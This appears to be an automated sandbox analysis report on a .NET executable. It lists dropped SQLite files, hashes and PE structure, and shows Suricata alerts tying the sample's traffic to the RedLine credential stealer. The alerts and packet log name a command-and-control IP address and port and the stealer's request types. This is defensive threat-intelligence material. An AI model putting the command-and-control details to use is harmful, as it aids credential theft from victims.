SHA-256:	6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:	DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:	false
Preview:	SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

C:\Users\user\AppData\Local\Temp\tmpE4F6.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE506.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE517.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE537.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE548.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE568.tmp

Download File

Process:	C:\Users\user\Desktop\UzQWEAhf9B.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9156324045035475
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	UzQWEAhf9B.exe
File size:	547'840 bytes
MD5:	357b2371c981675051594d5851dc7ca8
SHA1:	f2e766123692f906b589e9a63059ec938e6c81f6
SHA256:	91146fa003f23bd4dae8f201f8941d7adc54474bd3215f6b4d3f9a783abc6805
SHA512:	f6bb07430716f87a8ed0278b8dfabaa696c16d54e66b874c02809c15777d722f09d19702f27c3cc3c604b85aaac4f78ec42e212ac8ff9171630c2fb33d379603
SSDEEP:	12288:uY5Q6QcCTSY+aZrwrxvNs+3pneL7wET6sRf9hovCSHvtW:UT/4rHsAO7wO6OjovFg
TLSH:	ABC42303A9F4CFA5E87A4FF58E96729083F167358181EF5E4ED160CA663674002B1E6F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#Y.f..............0..D...........c... ........@.. ....................................@................................

File Icon


Icon Hash:	62ceac86b2968ea2

Static PE Info

General

Entrypoint:	0x48639e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A05923 [Wed Jul 24 01:30:11 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8634c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x88000	0x121c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x843a4	0x84400	80a6ca0fcc4fcf6aef220576bd177832	False	0.9375129223771267	data	7.926016195816783	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x88000	0x121c	0x1400	68b30827b52ee055230cd8f616445ad1	False	0.283984375	data	4.7743590332781105	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0xc	0x200	5f8173d0a04ff01c0b233f2a336eee64	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x88118	0xda8	Device independent bitmap graphic, 26 x 64 x 32, image size 3328	0.2823226544622426
RT_GROUP_ICON	0x88ec0	0x14	data	1.1
RT_GROUP_ICON	0x88ed4	0x14	data	1.05
RT_VERSION	0x88ee8	0x334	data	0.40853658536585363

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-27T06:57:52.425427+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49716	20.12.23.50	192.168.2.5
2024-07-27T06:57:06.472981+0200	TCP	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	49704	55615	192.168.2.5	185.222.58.236
2024-07-27T06:57:14.120202+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49708	20.12.23.50	192.168.2.5
2024-07-27T06:57:09.262622+0200	TCP	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	55615	49704	185.222.58.236	192.168.2.5
2024-07-27T06:57:09.625326+0200	TCP	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	49706	55615	192.168.2.5	185.222.58.236
2024-07-27T06:57:11.274552+0200	TCP	2848200	ETPRO MALWARE RedLine - GetUpdates Request	49707	55615	192.168.2.5	185.222.58.236
2024-07-27T06:57:01.238594+0200	TCP	2849662	ETPRO MALWARE RedLine - CheckConnect Request	49704	55615	192.168.2.5	185.222.58.236
2024-07-27T06:57:06.264027+0200	TCP	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	55615	49704	185.222.58.236	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 06:57:00.578186035 CEST	49704	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:00.585510015 CEST	55615	49704	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:00.585618973 CEST	49704	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:00.608025074 CEST	49704	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:00.615187883 CEST	55615	49704	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:00.957596064 CEST	49704	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:00.962733984 CEST	55615	49704	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:01.196583033 CEST	55615	49704	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:01.238594055 CEST	49704	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:06.258881092 CEST	49704	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:06.258881092 CEST	49704	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:06.264027119 CEST	55615	49704	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:06.264087915 CEST	55615	49704	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:06.431098938 CEST	55615	49704	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:06.472980976 CEST	49704	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:06.534907103 CEST	55615	49704	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:06.534962893 CEST	55615	49704	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:06.534998894 CEST	55615	49704	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:06.535029888 CEST	49704	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:06.535075903 CEST	55615	49704	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:06.535140038 CEST	49704	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.256376982 CEST	49704	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.256830931 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.262293100 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.262622118 CEST	55615	49704	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.262736082 CEST	49704	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.262742996 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.263360023 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.268598080 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.614253998 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.619539022 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.619566917 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.619631052 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.619637012 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.619667053 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.619673014 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.619702101 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.619714022 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.619743109 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.619755030 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.619766951 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.619769096 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.619788885 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.619828939 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.619970083 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.624821901 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.624835014 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.624845982 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.624885082 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.624896049 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.624907970 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.624967098 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.625021935 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.625178099 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.625325918 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.677391052 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.677649021 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.714417934 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.715195894 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.720524073 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720536947 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720547915 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720556021 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720560074 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720639944 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.720673084 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720681906 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720689058 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720696926 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720705032 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720712900 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.720721006 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720729113 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720732927 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720743895 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720752954 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.720774889 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720851898 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.720910072 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720922947 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720948935 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720956087 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720968962 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720977068 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720980883 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.720984936 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.720988035 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721004963 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721013069 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721021891 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721030951 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.721044064 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721069098 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.721100092 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721107960 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721110106 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.721148014 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.721157074 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721164942 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721175909 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.721219063 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.721308947 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721318007 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721321106 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721328020 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721343994 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721350908 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721358061 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721364975 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721390963 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721410036 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.721438885 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721447945 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721455097 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721472979 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.721503019 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.721510887 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721524954 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721530914 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.721541882 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721550941 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721565962 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721592903 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.721621990 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721626043 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.721631050 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.721656084 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.721700907 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.725836992 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.725888968 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.725956917 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.725965023 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.725965977 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726022959 CEST	49706	55615	192.168.2.5	185.222.58.236
Jul 27, 2024 06:57:09.726094007 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726103067 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726119041 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726126909 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726130009 CEST	55615	49706	185.222.58.236	192.168.2.5
Jul 27, 2024 06:57:09.726140022 CEST	55615	49706	185.222.58.236	192.168.2.5
